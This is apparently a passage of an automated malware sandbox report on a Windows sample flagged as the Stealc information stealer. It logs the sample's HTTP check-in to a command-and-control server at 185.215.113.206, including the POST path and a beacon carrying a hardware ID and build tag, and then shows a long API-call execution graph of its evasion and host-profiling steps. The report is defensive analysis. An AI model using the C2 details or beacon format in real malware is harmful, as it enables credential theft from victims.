                            Nov 20, 2024 17:41:17.968967915 CET8049723185.215.113.206192.168.2.6
                            Nov 20, 2024 17:41:19.245033026 CET8049723185.215.113.206192.168.2.6
                            Nov 20, 2024 17:41:19.247334003 CET4972380192.168.2.6185.215.113.206
                            Nov 20, 2024 17:41:19.273442030 CET4972380192.168.2.6185.215.113.206
                            Nov 20, 2024 17:41:19.395366907 CET8049723185.215.113.206192.168.2.6
                            Nov 20, 2024 17:41:19.739178896 CET8049723185.215.113.206192.168.2.6
                            Nov 20, 2024 17:41:19.739321947 CET4972380192.168.2.6185.215.113.206
                            Nov 20, 2024 17:41:23.341783047 CET4972380192.168.2.6185.215.113.206
                            • 185.215.113.206
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649723185.215.113.206806620C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Nov 20, 2024 17:41:17.842915058 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Nov 20, 2024 17:41:19.245033026 CET203INHTTP/1.1 200 OK
                            Date: Wed, 20 Nov 2024 16:41:19 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Nov 20, 2024 17:41:19.273442030 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHID
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 39 38 44 36 30 32 30 32 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 2d 2d 0d 0a
                            Data Ascii: ------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="hwid"4498D60202C53528003197------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="build"mars------ECGDAAFIIJDAAAAKFHID--
                            Nov 20, 2024 17:41:19.739178896 CET210INHTTP/1.1 200 OK
                            Date: Wed, 20 Nov 2024 16:41:19 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Target ID:1
                            Start time:11:41:14
                            Start date:20/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x390000
                            File size:1'753'088 bytes
                            MD5 hash:73DA003F0368F871F2BD1B9B2E0EC575
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:5.3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:16.5%
                              Total number of Nodes:1408
                              Total number of Limit Nodes:28
                              execution_graph 27387 39f639 144 API calls 27392 3916b9 200 API calls 27395 39bf39 177 API calls 27410 3aabb2 120 API calls 27378 3b3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27398 3a4b29 303 API calls 27411 3a23a9 298 API calls 27367 3b30a0 GetSystemPowerStatus 27384 3b29a0 GetCurrentProcess IsWow64Process 27412 39db99 671 API calls 27413 3a8615 47 API calls 27355 3b8819 free free free _raise 27368 3a2499 290 API calls 27370 3b749e 5 API calls ctype 27400 397710 free ctype 27401 3b9711 128 API calls __setmbcp 27357 3b2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27379 3b4e35 7 API calls 27402 39b309 98 API calls 27371 3a8c88 16 API calls 27358 39100e GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27372 3b2880 10 API calls 27373 3b4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27374 3b3480 6 API calls 27393 3b3280 7 API calls 27403 391b64 162 API calls 27414 39bbf9 90 API calls 27394 3af2f8 93 API calls 27375 3ae0f9 140 API calls 27404 3a6b79 138 API calls 27361 3b8471 120 API calls 2 library calls 25918 3b1bf0 25970 392a90 25918->25970 25922 3b1c03 25923 3b1c29 lstrcpy 25922->25923 25924 3b1c35 25922->25924 25923->25924 25925 3b1c6d GetSystemInfo 25924->25925 25926 3b1c65 ExitProcess 25924->25926 25927 3b1c7d ExitProcess 25925->25927 25928 3b1c85 25925->25928 26071 391030 GetCurrentProcess VirtualAllocExNuma 25928->26071 25933 3b1cb8 26083 3b2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25933->26083 25934 3b1ca2 25934->25933 25935 3b1cb0 ExitProcess 25934->25935 25937 3b1cbd 25938 3b1ce7 lstrlen 25937->25938 26292 3b2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25937->26292 25942 3b1cff 25938->25942 25940 3b1cd1 25940->25938 25945 3b1ce0 ExitProcess 25940->25945 25941 3b1d23 lstrlen 25943 3b1d39 25941->25943 25942->25941 25944 3b1d13 lstrcpy lstrcat 25942->25944 25946 3b1d5a 25943->25946 25947 3b1d46 lstrcpy lstrcat 25943->25947 25944->25941 25948 3b2ad0 3 API calls 25946->25948 25947->25946 25949 3b1d5f lstrlen 25948->25949 25952 3b1d74 25949->25952 25950 3b1d9a lstrlen 25951 3b1db0 25950->25951 25954 3b1dce 25951->25954 25955 3b1dba lstrcpy lstrcat 25951->25955 25952->25950 25953 3b1d87 lstrcpy lstrcat 25952->25953 25953->25950 26085 3b2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25954->26085 25955->25954 25957 3b1dd3 lstrlen 25958 3b1de7 25957->25958 25959 3b1df7 lstrcpy lstrcat 25958->25959 25960 3b1e0a 25958->25960 25959->25960 25961 3b1e28 lstrcpy 25960->25961 25962 3b1e30 25960->25962 25961->25962 25963 3b1e56 OpenEventA 25962->25963 25964 3b1e68 CloseHandle Sleep OpenEventA 25963->25964 25965 3b1e8c CreateEventA 25963->25965 25964->25964 25964->25965 26086 3b1b20 GetSystemTime 25965->26086 25969 3b1ea5 CloseHandle ExitProcess 26293 394a60 25970->26293 25972 392aa1 25973 394a60 2 API calls 25972->25973 25974 392ab7 25973->25974 25975 394a60 2 API calls 25974->25975 25976 392acd 25975->25976 25977 394a60 2 API calls 25976->25977 25978 392ae3 25977->25978 25979 394a60 2 API calls 25978->25979 25980 392af9 25979->25980 25981 394a60 2 API calls 25980->25981 25982 392b0f 25981->25982 25983 394a60 2 API calls 25982->25983 25984 392b28 25983->25984 25985 394a60 2 API calls 25984->25985 25986 392b3e 25985->25986 25987 394a60 2 API calls 25986->25987 25988 392b54 25987->25988 25989 394a60 2 API calls 25988->25989 25990 392b6a 25989->25990 25991 394a60 2 API calls 25990->25991 25992 392b80 25991->25992 25993 394a60 2 API calls 25992->25993 25994 392b96 25993->25994 25995 394a60 2 API calls 25994->25995 25996 392baf 25995->25996 25997 394a60 2 API calls 25996->25997 25998 392bc5 25997->25998 25999 394a60 2 API calls 25998->25999 26000 392bdb 25999->26000 26001 394a60 2 API calls 26000->26001 26002 392bf1 26001->26002 26003 394a60 2 API calls 26002->26003 26004 392c07 26003->26004 26005 394a60 2 API calls 26004->26005 26006 392c1d 26005->26006 26007 394a60 2 API calls 26006->26007 26008 392c36 26007->26008 26009 394a60 2 API calls 26008->26009 26010 392c4c 26009->26010 26011 394a60 2 API calls 26010->26011 26012 392c62 26011->26012 26013 394a60 2 API calls 26012->26013 26014 392c78 26013->26014 26015 394a60 2 API calls 26014->26015 26016 392c8e 26015->26016 26017 394a60 2 API calls 26016->26017 26018 392ca4 26017->26018 26019 394a60 2 API calls 26018->26019 26020 392cbd 26019->26020 26021 394a60 2 API calls 26020->26021 26022 392cd3 26021->26022 26023 394a60 2 API calls 26022->26023 26024 392ce9 26023->26024 26025 394a60 2 API calls 26024->26025 26026 392cff 26025->26026 26027 394a60 2 API calls 26026->26027 26028 392d15 26027->26028 26029 394a60 2 API calls 26028->26029 26030 392d2b 26029->26030 26031 394a60 2 API calls 26030->26031 26032 392d44 26031->26032 26033 394a60 2 API calls 26032->26033 26034 392d5a 26033->26034 26035 394a60 2 API calls 26034->26035 26036 392d70 26035->26036 26037 394a60 2 API calls 26036->26037 26038 392d86 26037->26038 26039 394a60 2 API calls 26038->26039 26040 392d9c 26039->26040 26041 394a60 2 API calls 26040->26041 26042 392db2 26041->26042 26043 394a60 2 API calls 26042->26043 26044 392dcb 26043->26044 26045 394a60 2 API calls 26044->26045 26046 392de1 26045->26046 26047 394a60 2 API calls 26046->26047 26048 392df7 26047->26048 26049 394a60 2 API calls 26048->26049 26050 392e0d 26049->26050 26051 394a60 2 API calls 26050->26051 26052 392e23 26051->26052 26053 394a60 2 API calls 26052->26053 26054 392e39 26053->26054 26055 394a60 2 API calls 26054->26055 26056 392e52 26055->26056 26057 3b6390 GetPEB 26056->26057 26058 3b65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26057->26058 26059 3b63c3 26057->26059 26060 3b6638 26058->26060 26061 3b6625 GetProcAddress 26058->26061 26066 3b63d7 20 API calls 26059->26066 26062 3b666c 26060->26062 26063 3b6641 GetProcAddress GetProcAddress 26060->26063 26061->26060 26064 3b6688 26062->26064 26065 3b6675 GetProcAddress 26062->26065 26063->26062 26067 3b6691 GetProcAddress 26064->26067 26068 3b66a4 26064->26068 26065->26064 26066->26058 26067->26068 26069 3b66ad GetProcAddress GetProcAddress 26068->26069 26070 3b66d7 26068->26070 26069->26070 26070->25922 26072 39105e VirtualAlloc 26071->26072 26073 391057 ExitProcess 26071->26073 26074 39107d 26072->26074 26075 39108a VirtualFree 26074->26075 26076 3910b1 26074->26076 26075->26076 26077 3910c0 26076->26077 26078 3910d0 GlobalMemoryStatusEx 26077->26078 26080 391112 ExitProcess 26078->26080 26081 3910f5 26078->26081 26081->26080 26082 39111a GetUserDefaultLangID 26081->26082 26082->25933 26082->25934 26084 3b2b24 26083->26084 26084->25937 26085->25957 26298 3b1820 26086->26298 26088 3b1b81 sscanf 26337 392a20 26088->26337 26091 3b1be9 26094 3affd0 26091->26094 26092 3b1bd6 26092->26091 26093 3b1be2 ExitProcess 26092->26093 26095 3affe0 26094->26095 26096 3b0019 lstrlen 26095->26096 26097 3b000d lstrcpy 26095->26097 26098 3b00d0 26096->26098 26097->26096 26099 3b00db lstrcpy 26098->26099 26100 3b00e7 lstrlen 26098->26100 26099->26100 26101 3b00ff 26100->26101 26102 3b010a lstrcpy 26101->26102 26103 3b0116 lstrlen 26101->26103 26102->26103 26104 3b012e 26103->26104 26105 3b0139 lstrcpy 26104->26105 26106 3b0145 26104->26106 26105->26106 26339 3b1570 26106->26339 26109 3b016e 26110 3b018f lstrlen 26109->26110 26111 3b0183 lstrcpy 26109->26111 26112 3b01a8 26110->26112 26111->26110 26113 3b01c9 lstrlen 26112->26113 26114 3b01bd lstrcpy 26112->26114 26115 3b01e8 26113->26115 26114->26113 26116 3b020c lstrlen 26115->26116 26117 3b0200 lstrcpy 26115->26117 26118 3b026a 26116->26118 26117->26116 26119 3b0282 lstrcpy 26118->26119 26120 3b028e 26118->26120 26119->26120 26349 392e70 26120->26349 26128 3b0540 26129 3b1570 4 API calls 26128->26129 26130 3b054f 26129->26130 26131 3b05a1 lstrlen 26130->26131 26132 3b0599 lstrcpy 26130->26132 26133 3b05bf 26131->26133 26132->26131 26134 3b05d1 lstrcpy lstrcat 26133->26134 26135 3b05e9 26133->26135 26134->26135 26136 3b0614 26135->26136 26137 3b060c lstrcpy 26135->26137 26138 3b061b lstrlen 26136->26138 26137->26136 26139 3b0636 26138->26139 26140 3b064a lstrcpy lstrcat 26139->26140 26141 3b0662 26139->26141 26140->26141 26142 3b0687 26141->26142 26143 3b067f lstrcpy 26141->26143 26144 3b068e lstrlen 26142->26144 26143->26142 26145 3b06b3 26144->26145 26146 3b06c7 lstrcpy lstrcat 26145->26146 26147 3b06db 26145->26147 26146->26147 26148 3b0704 lstrcpy 26147->26148 26149 3b070c 26147->26149 26148->26149 26150 3b0749 lstrcpy 26149->26150 26151 3b0751 26149->26151 26150->26151 27105 3b2740 GetWindowsDirectoryA 26151->27105 26153 3b0785 27114 394c50 26153->27114 26154 3b075d 26154->26153 26155 3b077d lstrcpy 26154->26155 26155->26153 26157 3b078f 27268 3a8ca0 StrCmpCA 26157->27268 26159 3b079b 26160 391530 8 API calls 26159->26160 26161 3b07bc 26160->26161 26162 3b07ed 26161->26162 26163 3b07e5 lstrcpy 26161->26163 27286 3960d0 80 API calls 26162->27286 26163->26162 26165 3b07fa 27287 3a81b0 10 API calls 26165->27287 26167 3b0809 26168 391530 8 API calls 26167->26168 26169 3b082f 26168->26169 26170 3b085e 26169->26170 26171 3b0856 lstrcpy 26169->26171 27288 3960d0 80 API calls 26170->27288 26171->26170 26173 3b086b 27289 3a7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26173->27289 26175 3b0876 26176 391530 8 API calls 26175->26176 26177 3b08a1 26176->26177 26178 3b08c9 lstrcpy 26177->26178 26179 3b08d5 26177->26179 26178->26179 27290 3960d0 80 API calls 26179->27290 26181 3b08db 27291 3a8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26181->27291 26183 3b08e6 26184 391530 8 API calls 26183->26184 26185 3b08f7 26184->26185 26186 3b092e 26185->26186 26187 3b0926 lstrcpy 26185->26187 27292 395640 8 API calls 26186->27292 26187->26186 26189 3b0933 26190 391530 8 API calls 26189->26190 26191 3b094c 26190->26191 27293 3a7280 1497 API calls 26191->27293 26193 3b099f 26194 391530 8 API calls 26193->26194 26195 3b09cf 26194->26195 26196 3b09fe 26195->26196 26197 3b09f6 lstrcpy 26195->26197 27294 3960d0 80 API calls 26196->27294 26197->26196 26199 3b0a0b 27295 3a83e0 7 API calls 26199->27295 26201 3b0a18 26202 391530 8 API calls 26201->26202 26203 3b0a29 26202->26203 27296 3924e0 230 API calls 26203->27296 26205 3b0a6b 26206 3b0a7f 26205->26206 26207 3b0b40 26205->26207 26208 391530 8 API calls 26206->26208 26209 391530 8 API calls 26207->26209 26210 3b0aa5 26208->26210 26212 3b0b59 26209->26212 26213 3b0acc lstrcpy 26210->26213 26214 3b0ad4 26210->26214 26211 3b0b87 27300 3960d0 80 API calls 26211->27300 26212->26211 26215 3b0b7f lstrcpy 26212->26215 26213->26214 27297 3960d0 80 API calls 26214->27297 26215->26211 26218 3b0b8d 27301 3ac840 70 API calls 26218->27301 26219 3b0ada 27298 3a85b0 47 API calls 26219->27298 26222 3b0b38 26225 3b0bd1 26222->26225 26228 391530 8 API calls 26222->26228 26223 3b0ae5 26224 391530 8 API calls 26223->26224 26227 3b0af6 26224->26227 26226 3b0bfa 26225->26226 26229 391530 8 API calls 26225->26229 26230 3b0c23 26226->26230 26235 391530 8 API calls 26226->26235 27299 3ad0f0 118 API calls 26227->27299 26232 3b0bb9 26228->26232 26234 3b0bf5 26229->26234 26233 3b0c4c 26230->26233 26237 391530 8 API calls 26230->26237 27302 3ad7b0 103 API calls setSBCS 26232->27302 26238 3b0c75 26233->26238 26244 391530 8 API calls 26233->26244 27304 3adfa0 149 API calls 26234->27304 26240 3b0c1e 26235->26240 26243 3b0c47 26237->26243 26245 3b0c9e 26238->26245 26251 391530 8 API calls 26238->26251 27305 3ae500 108 API calls 26240->27305 26241 3b0bbe 26242 391530 8 API calls 26241->26242 26247 3b0bcc 26242->26247 27306 3ae720 120 API calls 26243->27306 26250 3b0c70 26244->26250 26248 3b0cc7 26245->26248 26253 391530 8 API calls 26245->26253 27303 3aecb0 97 API calls 26247->27303 26254 3b0cf0 26248->26254 26259 391530 8 API calls 26248->26259 27307 3ae9e0 110 API calls 26250->27307 26256 3b0c99 26251->26256 26258 3b0cc2 26253->26258 26260 3b0dca 26254->26260 26261 3b0d04 26254->26261 27308 397bc0 153 API calls 26256->27308 27309 3aeb70 108 API calls 26258->27309 26265 3b0ceb 26259->26265 26263 391530 8 API calls 26260->26263 26262 391530 8 API calls 26261->26262 26267 3b0d2a 26262->26267 26268 3b0de3 26263->26268 27310 3b41e0 91 API calls 26265->27310 26270 3b0d5e 26267->26270 26271 3b0d56 lstrcpy 26267->26271 26269 3b0e11 26268->26269 26272 3b0e09 lstrcpy 26268->26272 27314 3960d0 80 API calls 26269->27314 27311 3960d0 80 API calls 26270->27311 26271->26270 26272->26269 26275 3b0e17 27315 3ac840 70 API calls 26275->27315 26276 3b0d64 27312 3a85b0 47 API calls 26276->27312 26279 3b0dc2 26282 391530 8 API calls 26279->26282 26280 3b0d6f 26281 391530 8 API calls 26280->26281 26283 3b0d80 26281->26283 26285 3b0e39 26282->26285 27313 3ad0f0 118 API calls 26283->27313 26286 3b0e67 26285->26286 26287 3b0e5f lstrcpy 26285->26287 27316 3960d0 80 API calls 26286->27316 26287->26286 26289 3b0e74 26291 3b0e95 26289->26291 27317 3b1660 12 API calls 26289->27317 26291->25969 26292->25940 26294 394a76 RtlAllocateHeap 26293->26294 26297 394ab4 VirtualProtect 26294->26297 26297->25972 26299 3b182e 26298->26299 26300 3b1849 lstrcpy 26299->26300 26301 3b1855 lstrlen 26299->26301 26300->26301 26302 3b1873 26301->26302 26303 3b1885 lstrcpy lstrcat 26302->26303 26304 3b1898 26302->26304 26303->26304 26305 3b18c7 26304->26305 26306 3b18bf lstrcpy 26304->26306 26307 3b18ce lstrlen 26305->26307 26306->26305 26308 3b18e6 26307->26308 26309 3b18f2 lstrcpy lstrcat 26308->26309 26310 3b1906 26308->26310 26309->26310 26311 3b1935 26310->26311 26312 3b192d lstrcpy 26310->26312 26313 3b193c lstrlen 26311->26313 26312->26311 26314 3b1958 26313->26314 26315 3b196a lstrcpy lstrcat 26314->26315 26316 3b197d 26314->26316 26315->26316 26317 3b19ac 26316->26317 26318 3b19a4 lstrcpy 26316->26318 26319 3b19b3 lstrlen 26317->26319 26318->26317 26320 3b19cb 26319->26320 26321 3b19d7 lstrcpy lstrcat 26320->26321 26322 3b19eb 26320->26322 26321->26322 26323 3b1a1a 26322->26323 26324 3b1a12 lstrcpy 26322->26324 26325 3b1a21 lstrlen 26323->26325 26324->26323 26326 3b1a3d 26325->26326 26327 3b1a4f lstrcpy lstrcat 26326->26327 26328 3b1a62 26326->26328 26327->26328 26329 3b1a91 26328->26329 26330 3b1a89 lstrcpy 26328->26330 26331 3b1a98 lstrlen 26329->26331 26330->26329 26332 3b1ab4 26331->26332 26333 3b1ac6 lstrcpy lstrcat 26332->26333 26334 3b1ad9 26332->26334 26333->26334 26335 3b1b08 26334->26335 26336 3b1b00 lstrcpy 26334->26336 26335->26088 26336->26335 26338 392a24 SystemTimeToFileTime SystemTimeToFileTime 26337->26338 26338->26091 26338->26092 26340 3b157f 26339->26340 26341 3b159f lstrcpy 26340->26341 26342 3b15a7 26340->26342 26341->26342 26343 3b15d7 lstrcpy 26342->26343 26344 3b15df 26342->26344 26343->26344 26345 3b160f lstrcpy 26344->26345 26346 3b1617 26344->26346 26345->26346 26347 3b0155 lstrlen 26346->26347 26348 3b1647 lstrcpy 26346->26348 26347->26109 26348->26347 26350 394a60 2 API calls 26349->26350 26351 392e82 26350->26351 26352 394a60 2 API calls 26351->26352 26353 392ea0 26352->26353 26354 394a60 2 API calls 26353->26354 26355 392eb6 26354->26355 26356 394a60 2 API calls 26355->26356 26357 392ecb 26356->26357 26358 394a60 2 API calls 26357->26358 26359 392eec 26358->26359 26360 394a60 2 API calls 26359->26360 26361 392f01 26360->26361 26362 394a60 2 API calls 26361->26362 26363 392f19 26362->26363 26364 394a60 2 API calls 26363->26364 26365 392f3a 26364->26365 26366 394a60 2 API calls 26365->26366 26367 392f4f 26366->26367 26368 394a60 2 API calls 26367->26368 26369 392f65 26368->26369 26370 394a60 2 API calls 26369->26370 26371 392f7b 26370->26371 26372 394a60 2 API calls 26371->26372 26373 392f91 26372->26373 26374 394a60 2 API calls 26373->26374 26375 392faa 26374->26375 26376 394a60 2 API calls 26375->26376 26377 392fc0 26376->26377 26378 394a60 2 API calls 26377->26378 26379 392fd6 26378->26379 26380 394a60 2 API calls 26379->26380 26381 392fec 26380->26381 26382 394a60 2 API calls 26381->26382 26383 393002 26382->26383 26384 394a60 2 API calls 26383->26384 26385 393018 26384->26385 26386 394a60 2 API calls 26385->26386 26387 393031 26386->26387 26388 394a60 2 API calls 26387->26388 26389 393047 26388->26389 26390 394a60 2 API calls 26389->26390 26391 39305d 26390->26391 26392 394a60 2 API calls 26391->26392 26393 393073 26392->26393 26394 394a60 2 API calls 26393->26394 26395 393089 26394->26395 26396 394a60 2 API calls 26395->26396 26397 39309f 26396->26397 26398 394a60 2 API calls 26397->26398 26399 3930b8 26398->26399 26400 394a60 2 API calls 26399->26400 26401 3930ce 26400->26401 26402 394a60 2 API calls 26401->26402 26403 3930e4 26402->26403 26404 394a60 2 API calls 26403->26404 26405 3930fa 26404->26405 26406 394a60 2 API calls 26405->26406 26407 393110 26406->26407 26408 394a60 2 API calls 26407->26408 26409 393126 26408->26409 26410 394a60 2 API calls 26409->26410 26411 39313f 26410->26411 26412 394a60 2 API calls 26411->26412 26413 393155 26412->26413 26414 394a60 2 API calls 26413->26414 26415 39316b 26414->26415 26416 394a60 2 API calls 26415->26416 26417 393181 26416->26417 26418 394a60 2 API calls 26417->26418 26419 393197 26418->26419 26420 394a60 2 API calls 26419->26420 26421 3931ad 26420->26421 26422 394a60 2 API calls 26421->26422 26423 3931c6 26422->26423 26424 394a60 2 API calls 26423->26424 26425 3931dc 26424->26425 26426 394a60 2 API calls 26425->26426 26427 3931f2 26426->26427 26428 394a60 2 API calls 26427->26428 26429 393208 26428->26429 26430 394a60 2 API calls 26429->26430 26431 39321e 26430->26431 26432 394a60 2 API calls 26431->26432 26433 393234 26432->26433 26434 394a60 2 API calls 26433->26434 26435 39324d 26434->26435 26436 394a60 2 API calls 26435->26436 26437 393263 26436->26437 26438 394a60 2 API calls 26437->26438 26439 393279 26438->26439 26440 394a60 2 API calls 26439->26440 26441 39328f 26440->26441 26442 394a60 2 API calls 26441->26442 26443 3932a5 26442->26443 26444 394a60 2 API calls 26443->26444 26445 3932bb 26444->26445 26446 394a60 2 API calls 26445->26446 26447 3932d4 26446->26447 26448 394a60 2 API calls 26447->26448 26449 3932ea 26448->26449 26450 394a60 2 API calls 26449->26450 26451 393300 26450->26451 26452 394a60 2 API calls 26451->26452 26453 393316 26452->26453 26454 394a60 2 API calls 26453->26454 26455 39332c 26454->26455 26456 394a60 2 API calls 26455->26456 26457 393342 26456->26457 26458 394a60 2 API calls 26457->26458 26459 39335b 26458->26459 26460 394a60 2 API calls 26459->26460 26461 393371 26460->26461 26462 394a60 2 API calls 26461->26462 26463 393387 26462->26463 26464 394a60 2 API calls 26463->26464 26465 39339d 26464->26465 26466 394a60 2 API calls 26465->26466 26467 3933b3 26466->26467 26468 394a60 2 API calls 26467->26468 26469 3933c9 26468->26469 26470 394a60 2 API calls 26469->26470 26471 3933e2 26470->26471 26472 394a60 2 API calls 26471->26472 26473 3933f8 26472->26473 26474 394a60 2 API calls 26473->26474 26475 39340e 26474->26475 26476 394a60 2 API calls 26475->26476 26477 393424 26476->26477 26478 394a60 2 API calls 26477->26478 26479 39343a 26478->26479 26480 394a60 2 API calls 26479->26480 26481 393450 26480->26481 26482 394a60 2 API calls 26481->26482 26483 393469 26482->26483 26484 394a60 2 API calls 26483->26484 26485 39347f 26484->26485 26486 394a60 2 API calls 26485->26486 26487 393495 26486->26487 26488 394a60 2 API calls 26487->26488 26489 3934ab 26488->26489 26490 394a60 2 API calls 26489->26490 26491 3934c1 26490->26491 26492 394a60 2 API calls 26491->26492 26493 3934d7 26492->26493 26494 394a60 2 API calls 26493->26494 26495 3934f0 26494->26495 26496 394a60 2 API calls 26495->26496 26497 393506 26496->26497 26498 394a60 2 API calls 26497->26498 26499 39351c 26498->26499 26500 394a60 2 API calls 26499->26500 26501 393532 26500->26501 26502 394a60 2 API calls 26501->26502 26503 393548 26502->26503 26504 394a60 2 API calls 26503->26504 26505 39355e 26504->26505 26506 394a60 2 API calls 26505->26506 26507 393577 26506->26507 26508 394a60 2 API calls 26507->26508 26509 39358d 26508->26509 26510 394a60 2 API calls 26509->26510 26511 3935a3 26510->26511 26512 394a60 2 API calls 26511->26512 26513 3935b9 26512->26513 26514 394a60 2 API calls 26513->26514 26515 3935cf 26514->26515 26516 394a60 2 API calls 26515->26516 26517 3935e5 26516->26517 26518 394a60 2 API calls 26517->26518 26519 3935fe 26518->26519 26520 394a60 2 API calls 26519->26520 26521 393614 26520->26521 26522 394a60 2 API calls 26521->26522 26523 39362a 26522->26523 26524 394a60 2 API calls 26523->26524 26525 393640 26524->26525 26526 394a60 2 API calls 26525->26526 26527 393656 26526->26527 26528 394a60 2 API calls 26527->26528 26529 39366c 26528->26529 26530 394a60 2 API calls 26529->26530 26531 393685 26530->26531 26532 394a60 2 API calls 26531->26532 26533 39369b 26532->26533 26534 394a60 2 API calls 26533->26534 26535 3936b1 26534->26535 26536 394a60 2 API calls 26535->26536 26537 3936c7 26536->26537 26538 394a60 2 API calls 26537->26538 26539 3936dd 26538->26539 26540 394a60 2 API calls 26539->26540 26541 3936f3 26540->26541 26542 394a60 2 API calls 26541->26542 26543 39370c 26542->26543 26544 394a60 2 API calls 26543->26544 26545 393722 26544->26545 26546 394a60 2 API calls 26545->26546 26547 393738 26546->26547 26548 394a60 2 API calls 26547->26548 26549 39374e 26548->26549 26550 394a60 2 API calls 26549->26550 26551 393764 26550->26551 26552 394a60 2 API calls 26551->26552 26553 39377a 26552->26553 26554 394a60 2 API calls 26553->26554 26555 393793 26554->26555 26556 394a60 2 API calls 26555->26556 26557 3937a9 26556->26557 26558 394a60 2 API calls 26557->26558 26559 3937bf 26558->26559 26560 394a60 2 API calls 26559->26560 26561 3937d5 26560->26561 26562 394a60 2 API calls 26561->26562 26563 3937eb 26562->26563 26564 394a60 2 API calls 26563->26564 26565 393801 26564->26565 26566 394a60 2 API calls 26565->26566 26567 39381a 26566->26567 26568 394a60 2 API calls 26567->26568 26569 393830 26568->26569 26570 394a60 2 API calls 26569->26570 26571 393846 26570->26571 26572 394a60 2 API calls 26571->26572 26573 39385c 26572->26573 26574 394a60 2 API calls 26573->26574 26575 393872 26574->26575 26576 394a60 2 API calls 26575->26576 26577 393888 26576->26577 26578 394a60 2 API calls 26577->26578 26579 3938a1 26578->26579 26580 394a60 2 API calls 26579->26580 26581 3938b7 26580->26581 26582 394a60 2 API calls 26581->26582 26583 3938cd 26582->26583 26584 394a60 2 API calls 26583->26584 26585 3938e3 26584->26585 26586 394a60 2 API calls 26585->26586 26587 3938f9 26586->26587 26588 394a60 2 API calls 26587->26588 26589 39390f 26588->26589 26590 394a60 2 API calls 26589->26590 26591 393928 26590->26591 26592 394a60 2 API calls 26591->26592 26593 39393e 26592->26593 26594 394a60 2 API calls 26593->26594 26595 393954 26594->26595 26596 394a60 2 API calls 26595->26596 26597 39396a 26596->26597 26598 394a60 2 API calls 26597->26598 26599 393980 26598->26599 26600 394a60 2 API calls 26599->26600 26601 393996 26600->26601 26602 394a60 2 API calls 26601->26602 26603 3939af 26602->26603 26604 394a60 2 API calls 26603->26604 26605 3939c5 26604->26605 26606 394a60 2 API calls 26605->26606 26607 3939db 26606->26607 26608 394a60 2 API calls 26607->26608 26609 3939f1 26608->26609 26610 394a60 2 API calls 26609->26610 26611 393a07 26610->26611 26612 394a60 2 API calls 26611->26612 26613 393a1d 26612->26613 26614 394a60 2 API calls 26613->26614 26615 393a36 26614->26615 26616 394a60 2 API calls 26615->26616 26617 393a4c 26616->26617 26618 394a60 2 API calls 26617->26618 26619 393a62 26618->26619 26620 394a60 2 API calls 26619->26620 26621 393a78 26620->26621 26622 394a60 2 API calls 26621->26622 26623 393a8e 26622->26623 26624 394a60 2 API calls 26623->26624 26625 393aa4 26624->26625 26626 394a60 2 API calls 26625->26626 26627 393abd 26626->26627 26628 394a60 2 API calls 26627->26628 26629 393ad3 26628->26629 26630 394a60 2 API calls 26629->26630 26631 393ae9 26630->26631 26632 394a60 2 API calls 26631->26632 